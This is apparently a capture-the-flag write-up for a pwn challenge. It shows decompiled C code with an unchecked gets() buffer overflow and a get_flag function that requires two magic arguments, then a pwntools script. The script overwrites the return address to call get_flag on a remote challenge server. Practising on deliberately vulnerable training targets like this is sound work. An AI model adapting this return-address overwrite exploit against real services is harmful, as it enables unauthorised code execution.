Reverse
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[56]; // [esp+4h] [ebp-38h] BYREF
printf("Qual a palavrinha magica? ", v4[0]);
gets(v4);
return 0;
}
void __cdecl get_flag(int a1, int a2)
{
int v2; // esi
unsigned __int8 v3; // al
int v4; // ecx
unsigned __int8 v5; // al
if ( a1 == 0x308CD64F && a2 == 0x195719D1 )
{
v2 = fopen("flag.txt", "rt");
v3 = getc(v2);
if ( v3 != 0xFF )
{
v4 = (char)v3;
do
{
putchar(v4);
v5 = getc(v2);
v4 = (char)v5;
}
while ( v5 != 0xFF );
}
fclose(v2);
}
}
Attack ideas
a1 == 0x308CD64F && a2 == 0x195719D1
get_flag function address 0x80489A0
main function address 0x8048A20
script attack
# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *
p=remote("node4.buuoj.cn",25455)
payload=b'a'*0x38+p32(0x80489A0)+p32(0x0804e6a0)+p32(0x308CD64F)+p32(0x195719D1)
p.sendline(payload)
p.interactive()
[Note] 0x0804e6a0 is the address of program exit. Only when the program can exit normally can the flag be echoed correctly.
(Another way to modify memory write permissions)